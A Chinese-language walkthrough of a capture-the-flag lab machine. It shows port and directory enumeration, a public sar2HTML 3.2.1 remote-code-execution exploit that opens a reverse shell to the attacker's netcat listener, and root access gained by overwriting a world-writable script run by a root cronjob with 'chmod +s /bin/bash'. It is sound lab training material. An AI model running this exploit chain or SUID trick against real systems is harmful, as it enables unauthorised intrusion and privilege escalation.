主要知识点

• 路径枚举
• cronjob提权

具体步骤

nmap扫描，只开了一个80端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 19:13 CST
Nmap scan report for 172.16.33.13
Host is up (0.035s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.78 seconds

枚举一下路径,发现有phpinfo和robots.txt，而robots.txt里有sar2HTML路径

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.16.33.13
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 277]
/.htaccess.php        (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/phpinfo.php          (Status: 200) [Size: 95390]
/robots.txt           (Status: 200) [Size: 9]
/server-status        (Status: 403) [Size: 277]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished

尝试访问一下sar2HTML，得知是3.2.1版本，搜索一下得知其有RCE漏洞

搜索相关信息，得到

https://github.com/Jsmoreira02/sar2HTML_exploit

直接利用它的shell_mode得到reverse shell

──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ python sar2html_exploit.py  http://172.16.33.13/sar2HTML --shell_mode_____            _____  _   _ ________  ___ _          _____           _       _ _   
/  ___|          / __  \| | | |_   _|  \/  || |        |  ___|         | |     (_) |  
\ `--.  __ _ _ __`' / /'| |_| | | | | .  . || |  ______| |____  ___ __ | | ___  _| |_ `--. \/ _` | '__| / /  |  _  | | | | |\/| || | |______|  __\ \/ / '_ \| |/ _ \| | __|
/\__/ / (_| | |  ./ /___| | | | | | | |  | || |____    | |___>  <| |_) | | (_) | | |_ 
\____/ \__,_|_|  \_____/\_| |_/ \_/ \_|  |_/\_____/    \____/_/\_\ .__/|_|\___/|_|\__|| |                  |_|                  [+] URL found! Starting shell upload...
------------------------------
LHOST= 10.8.0.204
LPORT= 80
------------------------------[+] Creating process...---> Server started http://127.0.0.1:8000
---> Listening on port 80Can't grab 0.0.0.0:80 with bind : Permission denied
[!] SHELL upload is possible in the target!Spawning your shell :)

┌──(kali㉿Timothy)-[~/Documents/GooAnn/172.16.33.13]
└─$ sudo nc -nlvp 80
[sudo] password for kali: 
listening on [any] 80 ...
connect to [10.8.0.204] from (UNKNOWN) [172.16.33.13] 53186
bash: cannot set terminal process group (774): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sar:/var/www/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

sudo -l和suid都没有什么有用的信息，上传Linpeas.sh并执行，得到

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh
......
......

这个finally.sh比较可疑，查看一下,看起来这个finally.sh会调用write.sh,而我们对于write.sh有写权限

www-data@sar:/var/www/html/sar2HTML$ cd /var/www/html/
cd /var/www/html/
www-data@sar:/var/www/html$ ls -l
ls -l
total 32
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Nov 16 16:07 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Nov 16 13:21 write.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh./write.sh

修改write.sh,让其赋予/bin/bash SUID

www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >write.sh
echo "chmod +s /bin/bash" >write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
chmod +s /bin/bash

等几分钟后，提权成功

ww-data@sar:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun  7  2019 /bin/bash
www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
bash-4.4# cat /root/root.txt
cat /root/root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99
bash-4.4# cat /home/love/Desktop/user.txt
cat /home/love/Desktop/user.txt
427a7e47deb4a8649c7cab38df232b52
bash-4.4#